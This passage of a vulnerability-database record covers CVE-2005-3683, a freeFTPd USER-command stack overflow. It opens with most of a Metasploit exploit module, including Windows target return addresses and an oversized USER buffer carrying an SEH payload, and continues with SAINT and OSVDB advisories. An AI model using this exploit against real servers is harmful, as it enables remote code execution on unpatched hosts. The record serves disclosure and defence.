=> 'freeFTPd 1.0 Username Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in the freeFTPd \nmulti-protocol file transfer service. This flaw can only be \nexploited when logging has been enabled (non-default). \n \n}, \n'Author' => 'MC', \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2005-3683'], \n[ 'OSVDB', '20909'], \n[ 'BID', '15457'], \n[ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038808.html'], \n \n], \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 800, \n'BadChars' => \"\\x00\\x20\\x0a\\x0d\", \n'StackAdjustment' => -3500, \n}, \n'Targets' => \n[ \n[ \n'Windows 2000 English ALL', \n{ \n'Platform' => 'win', \n'Ret' => 0x75022ac4, \n}, \n], \n[ \n'Windows XP Pro SP0/SP1 English', \n{ \n'Platform' => 'win', \n'Ret' => 0x71aa32ad, \n}, \n], \n[ \n'Windows NT SP5/SP6a English', \n{ \n'Platform' => 'win', \n'Ret' => 0x776a1799, \n}, \n], \n[ \n'Windows 2003 Server English', \n{ \n'Platform' => 'win', \n'Ret' => 0x7ffc0638, \n}, \n], \n])) \nend \n \ndef check \nconnect \ndisconnect \nif (banner =~ /freeFTPd 1\\.0/) \nreturn Exploit::CheckCode::Vulnerable \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect \n \nprint_status(\"Trying target #{target.name}...\") \n \nbuf = rand_text_english(1816, payload_badchars) \nseh = generate_seh_payload(target.ret) \nbuf[1008, seh.length] = seh \n \nsend_cmd( ['USER', buf] , false) \n \nhandler \ndisconnect \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/83039/freeftpd_user.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "saint": [{"lastseen": "2016-12-14T16:58:06", "bulletinFamily": "exploit", "description": "Added: 12/08/2005 \nCVE: [CVE-2005-3683](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3683>) \nBID: [15457](<http://www.securityfocus.com/bid/15457>) \nOSVDB: [20909](<http://www.osvdb.org/20909>) \n\n\n### Background\n\n[FreeFTPd](<http://www.freeftpd.com>) is a free FTP/FTPS/SFTP server for Windows platforms. \n\n### Problem\n\nAn unauthenticated remote attacker could execute arbitrary commands by sending a long, specially crafted argument to the USER command. \n\n### Resolution\n\n[Upgrade](<http://freeftpd.com/?ctt=download>) to the latest version of FreeFTPd. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0510.html> \n\n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "modified": "2005-12-08T00:00:00", "published": "2005-12-08T00:00:00", "id": "SAINT:3C63B2AD63630BFDDCA758E4396799B8", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/freeftpd_user_bo", "type": "saint", "title": "FreeFTPd user name buffer overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:08:18", "bulletinFamily": "exploit", "description": "Added: 12/08/2005 \nCVE: [CVE-2005-3683](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3683>) \nBID: [15457](<http://www.securityfocus.com/bid/15457>) \nOSVDB: [20909](<http://www.osvdb.org/20909>) \n\n\n### Background\n\n[FreeFTPd](<http://www.freeftpd.com>) is a free FTP/FTPS/SFTP server for Windows platforms. \n\n### Problem\n\nAn unauthenticated remote attacker could execute arbitrary commands by sending a long, specially crafted argument to the USER command. \n\n### Resolution\n\n[Upgrade](<http://freeftpd.com/?ctt=download>) to the latest version of FreeFTPd. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0510.html> \n\n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "modified": "2005-12-08T00:00:00", "published": "2005-12-08T00:00:00", "id": "SAINT:E52A832DC65BDA990CC0CB6C5E90106D", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/freeftpd_user_bo", "title": "FreeFTPd user name buffer overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-10-03T15:01:56", "bulletinFamily": "exploit", "description": "Added: 12/08/2005 \nCVE: [CVE-2005-3683](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3683>) \nBID: [15457](<http://www.securityfocus.com/bid/15457>) \nOSVDB: [20909](<http://www.osvdb.org/20909>) \n\n\n### Background\n\n[FreeFTPd](<http://www.freeftpd.com>) is a free FTP/FTPS/SFTP server for Windows platforms. \n\n### Problem\n\nAn unauthenticated remote attacker could execute arbitrary commands by sending a long, specially crafted argument to the USER command. \n\n### Resolution\n\n[Upgrade](<http://freeftpd.com/?ctt=download>) to the latest version of FreeFTPd. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0510.html> \n\n\n### Platforms\n\nWindows 2000 \nWindows XP \n \n\n", "modified": "2005-12-08T00:00:00", "published": "2005-12-08T00:00:00", "id": "SAINT:5C641AAB1A13783356628966CEFE2C4E", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/freeftpd_user_bo", "type": "saint", "title": "FreeFTPd user name buffer overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "description": "## Vulnerability Description\nA remote overflow exists in freeFTPd. The 'USER', 'MKD' and 'DELE' commands fail to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request containing an overly long string to the commands, a remote attacker can cause the daemon to crash resulting in a loss of availability.\n## Technical Description\nFor the USER command overflow, the default configuration is not vulnerable unless the Logging option \"Log events\" is checked.\n## Solution Description\nUpgrade to version 1.0.9 or higher, as it has been reported to fix the USER command vulnerability. However, the upgrade does not fix the MKD and DELE commands vulnerabilities.\n## Short Description\nA remote overflow exists in freeFTPd. The 'USER', 'MKD' and 'DELE' commands fail to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request containing an overly long string to the commands, a remote attacker can cause the daemon to crash resulting in a loss of availability.\n## References:\nVendor Specific News/Changelog Entry: http://freeftpd.com/?ctt=changelog\nSecurity Tracker: 1015230\n[Secunia Advisory ID:17583](https://secuniaresearch.flexerasoftware.com/advisories/17583/)\n[Secunia Advisory ID:17624](https://secuniaresearch.flexerasoftware.com/advisories/17624/)\n[Secunia Advisory ID:18684](https://secuniaresearch.flexerasoftware.com/advisories/18684/)\nRedHat RHSA: RHSA-2006:0190\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0527.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0510.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0543.html\nISS X-Force ID: 23118\nGeneric Exploit URL: http://www.securiteam.com/windowsntfocus/6X00T0AEKI.html\nGeneric Exploit URL: http://metasploit.com/projects/Framework/modules/exploits/freeftpd_user.pm\nFrSIRT Advisory: ADV-2005-2458\n[CVE-2005-3683](https://vulners.com/cve/CVE-2005-3683)\n[CVE-2005-3684](https://vulners.com/cve/CVE-2005-3684)\nBugtraq ID: 15486\nBugtraq ID: 15457\n", "modified": "2005-11-16T01:48:21", "published": "2005-11-16T01:48:21", "href": "https://vulners.com/osvdb/OSVDB:20909", "id": "OSVDB:20909", "title": "freeFTPd Multiple Command Remote Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
